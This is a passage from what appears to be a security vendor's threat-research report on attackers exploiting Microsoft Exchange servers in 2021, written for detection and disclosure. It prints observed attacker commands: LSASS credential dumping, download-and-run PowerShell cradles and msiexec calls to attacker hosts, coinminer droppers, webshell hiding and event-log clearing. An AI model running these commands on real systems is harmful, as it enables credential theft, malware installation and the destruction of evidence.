Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- 